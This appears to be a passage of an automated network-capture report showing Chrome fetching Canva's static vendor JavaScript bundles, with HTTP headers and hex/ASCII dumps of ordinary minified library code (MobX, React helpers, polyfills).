                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 2EA1DB62H2B5P18J
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: E.TdHQ9JaHYpE08O9RW1iCZy23b4Oknk
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC358INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 33 4e 33 6d 4f 73 30 48 6d 41 79 38 55 37 75 54 25 32 46 76 57 25 32 42 45 53 71 54 62 73 25 32 46 6b 5a 55 68 34 6d 25 32 42 62 64 75 5a 47 44 25 32 46 64 78 56 6e 7a 35 4e 45 53 31 78 59 47 78 76 6b 6a 31 53 4f 6b 6e 7a 64 63 50 73 4e 61 56 55 76 4b 7a 55 30 70 76 39 50 55 41 56 31 6e 50 42 63 69 70 63 7a 75 7a 72 57 64 61 79 59 25 32 42 57 64 49 31 74 56 68 25 32 46 33 48 6f 70 59 50 48 73 6b 4e 37 38 77 6f 31 34 66 34 31 61 51 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3N3mOs0HmAy8U7uT%2FvW%2BESqTbs%2FkZUh4m%2BbduZGD%2FdxVnz5NES1xYGxvkj1SOknzdcPsNaVUvKzU0pv9PUAV1nPBcipczuzrWdayY%2BWdI1tVh%2F3HopYPHskN78wo14f41aQ%3D"}],"group":"cf-nel","max_age
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1187INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 34 61 66 30 65 34 33 66 34 65 66 33 39 33 66 31 2e 76 65 6e 64 6f 72 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 36 35 33 5d 2c 7b 34 30 37 34 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 51 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 72 3d 6e 28 33 36 36 39 39 35 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 76 61 72 20 74 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 6e 3d 65 2e 72
                                                                                                                                                                                                                                                                    Data Ascii: /*! For license information please see 4af0e43f4ef393f1.vendor.js.LICENSE.txt */"use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[2653],{40749:(e,t,n)=>{n.d(t,{Q:()=>a});var r=n(366995);function a(e){var t=e.children,n=e.r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 6f 6e 20 61 20 66 75 6e 63 74 69 6f 6e 20 63 6f 6d 70 6f 6e 65 6e 74 20 77 72 61 70 70 65 64 20 69 6e 20 65 69 74 68 65 72 20 61 6e 6f 74 68 65 72 20 60 6f 62 73 65 72 76 65 72 60 20 6f 72 20 60 52 65 61 63 74 2e 6d 65 6d 6f 60 2e 20 54 68 65 20 6f 62 73 65 72 76 65 72 20 61 6c 72 65 61 64 79 20 61 70 70 6c 69 65 73 20 27 52 65 61 63 74 2e 6d 65 6d 6f 27 20 66 6f 72 20 79 6f 75 2e 22 29 3b 69 66 28 28 30 2c 6f 2e 46 29 28 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 66 6f 72 77 61 72 64 52 65 66 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 26 26 6e 2c 61 3d 65 2c 75 3d 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 65 2e 6e 61 6d 65 3b 69 66 28 63 26 26 65 2e 24 24 74 79 70 65
                                                                                                                                                                                                                                                                    Data Ascii: on a function component wrapped in either another `observer` or `React.memo`. The observer already applies 'React.memo' for you.");if((0,o.F)())return e;var r=null!==(n=null==t?void 0:t.forwardRef)&&void 0!==n&&n,a=e,u=e.displayName||e.name;if(c&&e.$$type
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 3b 76 61 72 20 72 3d 6e 28 34 32 37 38 32 29 2c 61 3d 6e 28 38 37 35 36 30 34 29 2c 69 3d 6e 28 35 36 32 32 35 29 2c 6f 3d 6e 28 37 37 35 33 32 38 29 2c 6c 3d 6e 28 37 35 31 35 38 36 29 2c 75 3d 6e 28 34 33 34 33 36 36 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 65 2e 72 65 61 63 74 69 6f 6e 3d 6e 65 77 20 72 2e 6c 65 28 22 6f 62 73 65 72 76 65 72 22 2e 63 6f 6e 63 61 74 28 65 2e 6e 61 6d 65 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 65 2e 73 74 61 74 65 56 65 72 73 69 6f 6e 3d 53 79 6d 62 6f 6c 28 29 2c 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 6f 6e 53 74 6f 72 65 43 68 61 6e 67 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 63 61 6c 6c 28 65 29 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 69 66 28 76 6f 69 64 20 30
                                                                                                                                                                                                                                                                    Data Ascii: ;var r=n(42782),a=n(875604),i=n(56225),o=n(775328),l=n(751586),u=n(434366);function s(e){e.reaction=new r.le("observer".concat(e.name),(function(){var t;e.stateVersion=Symbol(),null===(t=e.onStoreChange)||void 0===t||t.call(e)}))}function c(e,t){if(void 0
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 74 69 6f 6e 28 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 31 65 34 29 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 2e 73 77 65 65 70 54 69 6d 65 6f 75 74 29 2c 74 2e 73 77 65 65 70 54 69 6d 65 6f 75 74 3d 76 6f 69 64 20 30 3b 76 61 72 20 6e 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 74 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 2c 61 29 7b 6e 2d 72 2e 72 65 67 69 73 74 65 72 65 64 41 74 3e 3d 65 26 26 28 74 2e 66 69 6e 61 6c 69 7a 65 28 72 2e 76 61 6c 75 65 29 2c 74 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 73 2e 64 65 6c 65 74 65 28 61 29 29 7d 29 29 2c 74 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 73 2e 73 69 7a 65 3e 30 26 26 74 2e 73 63 68 65 64 75 6c 65 53 77 65 65 70 28 29 7d 7d 29 2c 4f 62 6a
                                                                                                                                                                                                                                                                    Data Ascii: tion(e){void 0===e&&(e=1e4),clearTimeout(t.sweepTimeout),t.sweepTimeout=void 0;var n=Date.now();t.registrations.forEach((function(r,a){n-r.registeredAt>=e&&(t.finalize(r.value),t.registrations.delete(a))})),t.registrations.size>0&&t.scheduleSweep()}}),Obj
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 28 38 38 30 32 30 37 29 2e 53 42 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 72 65 61 63 74 69 6f 6e 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 64 69 73 70 6f 73 65 28 29 2c 65 2e 72 65 61 63 74 69 6f 6e 3d 6e 75 6c 6c 7d 29 29 7d 2c 35 36 32 32 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 65 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 72 3d 6e 28 34 32 37 38 32 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 72 2e 47 66 29 28 65 29 7d 7d 2c 34 30 34 39 33 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 6d 3a 28 29 3d 3e 72 2e 75 6e 73 74 61 62 6c 65 5f 62 61 74 63 68 65 64 55 70 64 61 74 65 73 7d 29 3b 76 61 72 20 72 3d 6e 28 32 30 34 33 35 38 29 7d
                                                                                                                                                                                                                                                                    Data Ascii: (880207).SB)((function(e){var t;null===(t=e.reaction)||void 0===t||t.dispose(),e.reaction=null}))},56225:(e,t,n)=>{n.d(t,{e:()=>a});var r=n(42782);function a(e){return(0,r.Gf)(e)}},404935:(e,t,n)=>{n.d(t,{m:()=>r.unstable_batchedUpdates});var r=n(204358)}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 6e 20 76 28 65 29 7b 76 61 72 20 74 3d 21 31 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 74 3d 21 30 2c 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 76 61 72 20 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 79 28 65 29 7b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 65 29 7b 63 61 73 65 22 73 74 72 69 6e 67 22 3a 63 61 73 65 22 73 79 6d 62 6f 6c 22 3a 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 65 26
                                                                                                                                                                                                                                                                    Data Ascii: n v(e){var t=!1;return function(){if(!t)return t=!0,e.apply(this,arguments)}}var g=function(){};function m(e){return"function"==typeof e}function y(e){switch(typeof e){case"string":case"symbol":case"number":return!0}return!1}function b(e){return null!==e&
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 72 65 74 75 72 6e 20 50 28 65 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 74 5b 6e 5d 3d 6c 28 65 2c 6e 29 7d 29 29 2c 74 7d 3b 66 75 6e 63 74 69 6f 6e 20 4c 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 21 28 65 26 74 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 3f 65 7c 3d 74 3a 65 26 3d 7e 74 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 65 2c 74 29 7b 28 6e 75 6c 6c 3d 3d 74 7c 7c 74 3e 65 2e 6c 65 6e 67 74 68 29 26 26 28 74 3d 65 2e 6c 65 6e 67 74 68 29 3b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 41 72 72 61 79 28 74 29 3b 6e 3c 74 3b 6e 2b 2b 29 72 5b 6e 5d 3d 65 5b 6e 5d 3b 72 65
                                                                                                                                                                                                                                                                    Data Ascii: pertyDescriptors||function(e){var t={};return P(e).forEach((function(n){t[n]=l(e,n)})),t};function L(e,t){return!!(e&t)}function R(e,t,n){return n?e|=t:e&=~t,e}function z(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=Array(t);n<t;n++)r[n]=e[n];re
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 76 61 72 20 72 20 69 6e 20 6e 29 28 7b 7d 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 72 29 26 26 28 65 5b 72 5d 3d 6e 5b 72 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 49 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 56 28 65 2c 74 29 7b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 65 2c 46 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 46 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2e 62 69 6e 64 28 29 3a 66 75 6e
                                                                                                                                                                                                                                                                    Data Ascii: var r in n)({}).hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},I.apply(null,arguments)}function V(e,t){e.prototype=Object.create(t.prototype),e.prototype.constructor=e,F(e,t)}function F(e,t){return F=Object.setPrototypeOf?Object.setPrototypeOf.bind():fun
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 2e 72 65 70 6f 72 74 4f 62 73 65 72 76 65 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 78 74 28 74 68 69 73 29 7d 2c 74 2e 72 65 70 6f 72 74 43 68 61 6e 67 65 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6b 74 28 29 2c 45 74 28 74 68 69 73 29 2c 53 74 28 29 7d 2c 74 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 61 6d 65 5f 7d 2c 6a 28 65 2c 5b 7b 6b 65 79 3a 22 69 73 42 65 69 6e 67 4f 62 73 65 72 76 65 64 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 28 74 68 69 73 2e 66 6c 61 67 73 5f 2c 65 2e 69 73 42 65 69 6e 67 4f 62 73 65 72 76 65 64 4d 61 73 6b 5f 29 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 66 6c 61 67 73 5f 3d 52 28 74 68 69 73
                                                                                                                                                                                                                                                                    Data Ascii: .reportObserved=function(){return xt(this)},t.reportChanged=function(){kt(),Et(this),St()},t.toString=function(){return this.name_},j(e,[{key:"isBeingObserved",get:function(){return L(this.flags_,e.isBeingObservedMask_)},set:function(t){this.flags_=R(this


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    19192.168.2.1249737104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC622OUTGET /web/ad9231ed6706fadf.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:32 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 418962
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950e00a254384-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 4281691
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "74774747b99f5dec64505a1e8a9af3af"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:18 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 02 Oct 2024 01:22:08 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 03 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: uHuT2SXNaQUsUOKl8VSrL8xryyW5VpXpK7mru3023bheZPabt8YpEwOuJXC2TaxgTq74RPrjKKg=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 5C1DY7XN0DGR9N5P
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: Vep5esUOiAlk_YOGgeW99vWBouhV9n9g
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 33 58 7a 36 75 4e 48 41 4e 67 31 32 4c 44 74 68 37 67 72 46 6b 4f 6a 42 25 32 42 31 77 36 30 71 58 4f 79 70 70 61 65 67 6a 4d 38 25 32 46 46 66 4a 7a 41 55 64 6f 69 63 46 38 6e 65 45 48 4d 73 6b 79 69 6a 73 52 37 53 35 30 67 78 25 32 42 47 54 78 5a 69 4a 66 7a 4d 64 25 32 42 50 36 7a 4a 34 52 6d 75 69 5a 4d 6b 78 4b 42 71 33 7a 34 62 72 50 4c 6d 70 59 78 76 63 74 6e 4e 66 4c 44 51 6d 53 35 51 6a 55 54 5a 4a 39 41 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Xz6uNHANg12LDth7grFkOjB%2B1w60qXOyppaegjM8%2FFfJzAUdoicF8neEHMskyijsR7S50gx%2BGTxZiJfzMd%2BP6zJ4RmuiZMkxKBq3z4brPLmpYxvctnNfLDQmS5QjUTZJ9A%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1193INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 61 64 39 32 33 31 65 64 36 37 30 36 66 61 64 66 2e 76 65 6e 64 6f 72 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 34 33 36 5d 2c 7b 39 30 37 35 35 34 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 6e 2e 67 2c 72 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                    Data Ascii: /*! For license information please see ad9231ed6706fadf.vendor.js.LICENSE.txt */(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5436],{907554:(e,t,n)=>{!function(){var e="undefined"!=typeof window?window:n.g,r={};for(var i in functio
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 72 72 61 79 29 29 7b 65 3d 6c 28 65 29 3b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 5b 5d 3b 21 28 74 3d 65 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6e 2e 70 75 73 68 28 74 2e 76 61 6c 75 65 29 3b 65 3d 6e 7d 72 65 74 75 72 6e 20 65 7d 75 28 22 53 79 6d 62 6f 6c 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 74 68 69 73 2e 67 3d 65 2c 6f 28 74 68 69 73 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 74 7d 29 7d 69 66 28 65 29 72 65 74 75 72 6e 20 65 3b 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 7d 3b 76 61 72 20 6e 3d 22
                                                                                                                                                                                                                                                                    Data Ascii: rray)){e=l(e);for(var t,n=[];!(t=e.next()).done;)n.push(t.value);e=n}return e}u("Symbol",(function(e){function t(e,t){this.g=e,o(this,"description",{configurable:!0,writable:!0,value:t})}if(e)return e;t.prototype.toString=function(){return this.g};var n="
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 6e 29 3b 72 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 72 29 7d 65 6c 73 65 20 65 5b 6e 5d 3d 74 5b 6e 5d 3b 65 2e 7a 67 3d 74 2e 70 72 6f 74 6f 74 79 70 65 7d 66 75 6e 63 74 69 6f 6e 20 79 28 29 7b 74 68 69 73 2e 6f 3d 21 31 2c 74 68 69 73 2e 6c 3d 6e 75 6c 6c 2c 74 68 69 73 2e 68 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 67 3d 31 2c 74 68 69 73 2e 6a 3d 74 68 69 73 2e 6d 3d 30 2c 74 68 69 73 2e 75 3d 74 68 69 73 2e 69 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 69 66 28 65 2e 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 72 75 6e 6e 69 6e 67 22
                                                                                                                                                                                                                                                                    Data Ascii: OwnPropertyDescriptor(t,n);r&&Object.defineProperty(e,n,r)}else e[n]=t[n];e.zg=t.prototype}function y(){this.o=!1,this.l=null,this.h=void 0,this.g=1,this.j=this.m=0,this.u=this.i=null}function b(e){if(e.o)throw new TypeError("Generator is already running"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 4d 28 65 29 29 2c 74 7d 2c 74 68 69 73 2e 72 65 74 75 72 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 62 28 65 2e 67 29 3b 76 61 72 20 6e 3d 65 2e 67 2e 6c 3b 72 65 74 75 72 6e 20 6e 3f 5f 28 65 2c 22 72 65 74 75 72 6e 22 69 6e 20 6e 3f 6e 2e 72 65 74 75 72 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 76 61 6c 75 65 3a 65 2c 64 6f 6e 65 3a 21 30 7d 7d 2c 74 2c 65 2e 67 2e 72 65 74 75 72 6e 29 3a 28 65 2e 67 2e 72 65 74 75 72 6e 28 74 29 2c 4d 28 65 29 29 7d 28 65 2c 74 29 7d 2c 74 68 69 73 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 72 65 74 75 72 6e 20 66
                                                                                                                                                                                                                                                                    Data Ascii: M(e)),t},this.return=function(t){return function(e,t){b(e.g);var n=e.g.l;return n?_(e,"return"in n?n.return:function(e){return{value:e,done:!0}},t,e.g.return):(e.g.return(t),M(e))}(e,t)},this[Symbol.iterator]=function(){return this}}function P(e){return f
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 6a 7d 2c 79 2e 70 72 6f 74 6f 74 79 70 65 2e 42 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 67 3d 65 7d 2c 75 28 22 50 72 6f 6d 69 73 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 74 68 69 73 2e 68 3d 30 2c 74 68 69 73 2e 69 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 67 3d 5b 5d 2c 74 68 69 73 2e 6f 3d 21 31 3b 76 61 72 20 74 3d 74 68 69 73 2e 6a 28 29 3b 74 72 79 7b 65 28 74 2e 72 65 73 6f 6c 76 65 2c 74 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 69 29 7b 74 2e 72 65 6a 65 63 74 28 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 74 68 69 73 2e 67 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 3f 65 3a 6e 65 77 20 74 28 28 66
                                                                                                                                                                                                                                                                    Data Ascii: j},y.prototype.B=function(e){this.g=e},u("Promise",(function(e){function t(e){this.h=0,this.i=void 0,this.g=[],this.o=!1;var t=this.j();try{e(t.resolve,t.reject)}catch(i){t.reject(i)}}function n(){this.g=null}function r(e){return e instanceof t?e:new t((f
